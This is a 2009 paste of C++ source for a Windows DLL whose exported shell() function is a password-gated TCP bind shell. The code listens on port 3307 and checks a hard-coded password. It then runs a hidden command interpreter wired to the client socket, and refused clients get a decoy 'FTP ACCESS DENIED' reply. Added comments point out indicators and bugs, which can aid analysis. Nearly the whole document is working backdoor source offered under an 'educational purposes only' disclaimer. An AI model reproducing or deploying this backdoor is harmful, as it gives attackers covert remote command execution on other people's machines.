
DiabloHorn

a guest
Nov 9th, 2009
/*
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+This is a little disclaimer in case you haven't read the one on our site.        +
+The tools and tutorials KD-Team develops and publishes are meant for             +
+educational purposes only. WE DO NOT encourage the use of these tools and        +
+tutorials for malicious purposes. We learned a lot during the development of     +
+them, so we hope you also learn and don't just use it without any brains.        +
+We take completely NO responsibility for any damage caused by them, nor          +
+are we or our ISP responsible for what you do with them.                         +
+Greetz: KD-Team                                                                  +
+http://www.kd-team.com                                                           +
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
*/
#include <winsock2.h>
#include <windows.h>
#include <stdio.h>
#include <stdlib.h>


// TCP port the listener binds to (network indicator for this sample).
#define SERVPORT 3307
// Size of the receive buffer; recv() below asks for at most RCVBUFSIZE - 1 bytes.
#define RCVBUFSIZE 32
// Hard-coded plaintext password, stored as a literal in the compiled DLL.
#define PASSWORD "itworksihope"

/*
 * shell - DLL export (C linkage) implementing a password-gated TCP bind shell.
 *
 * Behaviour visible in this function:
 *  - listens on TCP port SERVPORT on every local interface (INADDR_ANY);
 *  - reads at most RCVBUFSIZE - 1 bytes from each client and compares the
 *    first line with the hard-coded PASSWORD;
 *  - on a match, starts the program named by %COMSPEC% with stdin, stdout and
 *    stderr set to the client socket and a hidden window, then blocks until
 *    that process exits, so one session is served at a time;
 *  - on a mismatch, replies "FTP ACCESS DENIED\n" and closes the connection.
 *
 * Returns 0 after the accept loop ends, which happens when accept() fails or
 * when reading COMSPEC / creating the process fails.
 *
 * Analysis notes:
 *  - Nothing here encrypts the connection, so the password and the whole
 *    session cross the network in cleartext.
 *  - Host-side artefacts: a TCP listener on SERVPORT owned by whichever process
 *    loaded the DLL and called shell(), and a child command interpreter whose
 *    standard handles are a socket.
 *  - The set-up error branches clean up but do not return, so execution
 *    continues into the following calls after a failure.
 */
extern "C" __declspec (dllexport) int shell()
{
//locals for the socket setup and for the child process
    WSADATA wsa;
    SOCKET hSock;
    SOCKET hLstnSock;
    unsigned int ClientLen;
    struct sockaddr_in ServAddr;
    struct sockaddr_in ClientAddr;
    STARTUPINFO si;
    PROCESS_INFORMATION pi={0};
    int BytesRcvd;
    char *tok;
    char echoBuffer[RCVBUFSIZE];
    char comspec[MAX_PATH];

//initialise Winsock (version 2.0 requested); a failure is silently ignored
    if(WSAStartup(MAKEWORD(2,0),&wsa) != 0)
    {
        //printf("WSAStartup() failed\n");
    }

//zero the address struct, then fill it: IPv4, all interfaces, port SERVPORT
    memset(&ServAddr,0,sizeof(ServAddr));
    ServAddr.sin_family = AF_INET;
    ServAddr.sin_addr.s_addr = htonl(INADDR_ANY);
    ServAddr.sin_port = htons(SERVPORT);

//making the socket NOTE it must be WSASocket else it won't pass the handle to the Process
//NOTE(review): SOCKET is an unsigned type and WSASocket() reports failure as
//INVALID_SOCKET, so this "< 0" test cannot be true; the branch is dead code.
    if((hLstnSock = WSASocket(AF_INET, SOCK_STREAM, IPPROTO_TCP,0,0,0)) < 0)
    {
        //printf("socket() %d failed\n",WSAGetLastError());
        WSACleanup();
    }
//binding the listening socket; on failure the socket is closed but execution continues
    if(bind(hLstnSock,(struct sockaddr *)&ServAddr,sizeof(ServAddr)) < 0)
    {
        //printf("bind() %d failed\n",WSAGetLastError());
        closesocket(hLstnSock);
    }
//listening with a backlog of 1; on failure execution still continues into the loop
    if(listen(hLstnSock,1)< 0)
    {
        //printf("listen() %d failed\n",WSAGetLastError());
        closesocket(hLstnSock);
        WSACleanup();
    }

//accept loop: runs until accept() fails or one of the breaks below is hit
    while(1)
    {
        ClientLen = sizeof(ClientAddr);
//accepting the incoming connection
        hSock = accept(hLstnSock, (struct sockaddr *)&ClientAddr, (int *)&ClientLen);
        if(hSock == INVALID_SOCKET)
        {
            break;
        }
//a single recv() of at most RCVBUFSIZE - 1 bytes carries the password attempt
//NOTE(review): when recv() returns <= 0, hSock is not closed before the next accept()
        BytesRcvd = recv(hSock, echoBuffer,RCVBUFSIZE -1,0);
        if(BytesRcvd > 0)
        {
//this is the little authentication sequence
//a strtok() is needed since -1 doesn't always do what one wants.
//strtok() overwrites the first '\n' with a NUL in place; tok itself is not used afterwards.
//NOTE(review): echoBuffer is never zeroed or NUL-terminated after recv(), so
//strtok()/strcmp() depend on the peer having sent a newline in the received bytes.

            tok = strtok(echoBuffer,"\n");
            if((strcmp(echoBuffer,PASSWORD))==0)
            {
                //printf("Pass correct\n");
//password matched: set up and start the child process

                memset(&si,0,sizeof(si));
                GetStartupInfo(&si);
//use explicit std handles and a hidden window; all three std handles are the client socket
                si.cb = sizeof(si);
                si.dwFlags = STARTF_USESTDHANDLES | STARTF_USESHOWWINDOW;
                si.wShowWindow = SW_HIDE;
                si.hStdInput = (HANDLE)hSock;
                si.hStdOutput = (HANDLE)hSock;
                si.hStdError =(HANDLE)hSock;
//the interpreter path is read from %COMSPEC% instead of hard-coding cmd.exe
//NOTE(review): this break leaves the loop without closing hSock
                if(GetEnvironmentVariable("COMSPEC", comspec, MAX_PATH) == 0)
                {
                    //printf("Environment var failed\n");
                    break;
                }
//creating the process; bInheritHandles is TRUE so the child inherits the socket handle
//NOTE(review): this break also leaves the loop without closing hSock
                if(!CreateProcess(NULL,comspec, NULL, NULL, TRUE, CREATE_NEW_CONSOLE, 0, NULL, &si, &pi)) //CREATE_NO_WINDOW
                {
                    //printf("process creation failed\n");
                    break;
                }
//block until the child exits; no other client is accepted in the meantime
                WaitForSingleObject(pi.hProcess, INFINITE);
//little cleanup: release the process/thread handles and the client socket
                CloseHandle(pi.hProcess);
                CloseHandle(pi.hThread);
                closesocket(hSock);
            }
            else
            {
//authentication failed: send a fixed reply and drop the client.
//the reply text mentions FTP although nothing in this function speaks FTP;
//the literal string can serve as a network indicator for this sample.
                //printf("incorrect pass\n");
                send(hSock,"FTP ACCESS DENIED\n",strlen("FTP ACCESS DENIED\n"),0);
                closesocket(hSock);
            }
        }

    }
//loop ended: close the listener; WSACleanup() is not called on this path
    closesocket(hLstnSock);
    return 0;
}
